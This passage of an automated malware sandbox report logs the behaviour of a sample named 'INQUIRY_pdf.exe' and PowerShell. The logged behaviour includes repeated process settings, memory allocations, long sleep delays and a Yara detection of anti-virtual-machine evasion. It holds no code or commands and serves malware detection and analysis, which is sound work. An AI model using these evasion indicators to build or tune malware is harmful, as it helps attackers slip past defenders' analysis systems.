Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 1100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 2B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 1170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 7E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 8E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 9050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: A050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 1040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 2A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Memory allocated: 4A30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599855	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598861	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597856	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596742	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596515	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596393	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596274	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595389	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6261	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3475	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Window / User API: threadDelayed 2209	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Window / User API: threadDelayed 7641	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7940	Thread sleep count: 2209 > 30	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599855s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7940	Thread sleep count: 7641 > 30	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598861s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -597093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596742s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596393s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596274s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595389s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -595046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe TID: 7900	Thread sleep time: -594500s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599855	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598861	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597856	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596742	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596515	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596393	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Thread delayed: delay time: 596274	Jump to behavior
